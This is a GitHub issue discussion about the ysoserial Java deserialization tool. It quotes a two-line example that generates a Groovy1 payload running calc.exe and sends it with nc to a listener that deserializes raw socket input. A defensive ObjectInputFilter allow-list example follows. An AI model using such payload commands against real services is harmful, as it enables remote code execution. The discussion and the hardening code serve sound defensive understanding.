frohoff / ysoserial

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
http://frohoff.github.io/appseccali-marshalling-pickles/
MIT License

groovypayload.bin example question #175

Closed ivantsyba closed 2 years ago

ivantsyba commented 2 years ago

In this example:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

Do you need to convince the exploited JVM to load the Groovy1 class from 10.10.10.10:1099 via RMI to make all this work?

frohoff commented 2 years ago

No, this is an example of exploiting a simple TCP listener that does just a readObject() from an ObjectInputStream that wraps the TCP stream (terrible idea).

Example here https://stackoverflow.com/questions/7022063/java-listening-to-a-socket-with-objectinputstream.
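
For anyone maintaining a listener of the kind described in the answer above, this is an added example (not code from ysoserial or from the linked Stack Overflow post) of the same `readObject()` call restricted by an allow-list `ObjectInputFilter`, available from Java 9. The class name `FilteredListenerDemo`, the `Ping` message type and the limit values are assumptions made for illustration; in a real service `readFiltered` would be handed `socket.getInputStream()`.

```java
import java.io.*;
import java.util.ArrayList;

public class FilteredListenerDemo {
    // Hypothetical message type: the only object this service expects to receive.
    static class Ping implements Serializable {
        private static final long serialVersionUID = 1L;
        final String text;
        Ping(String text) { this.text = text; }
    }

    // Allow-list filter: permit Ping and String, cap the object graph and
    // stream size, and reject every other class with the trailing "!*".
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
        "FilteredListenerDemo$Ping;java.lang.String;"
        + "maxdepth=5;maxrefs=100;maxbytes=4096;!*");

    // Replacement for a bare `new ObjectInputStream(in).readObject()`.
    // The filter runs before any class outside the allow-list is instantiated.
    static Object readFiltered(InputStream in)
            throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(in);
        ois.setObjectInputFilter(FILTER);
        return ois.readObject();
    }

    // Helper that builds constructed sample input so the demo runs offline.
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Expected type: passes the filter.
        Object ok = readFiltered(new ByteArrayInputStream(serialize(new Ping("hello"))));
        System.out.println("accepted: " + ok.getClass().getName());

        // Any class not on the allow-list (a harmless ArrayList stands in here)
        // is refused with InvalidClassException before it is deserialized.
        try {
            readFiltered(new ByteArrayInputStream(serialize(new ArrayList<String>())));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern string can be applied JVM-wide through the `jdk.serialFilter` system property when the listener code itself cannot be changed.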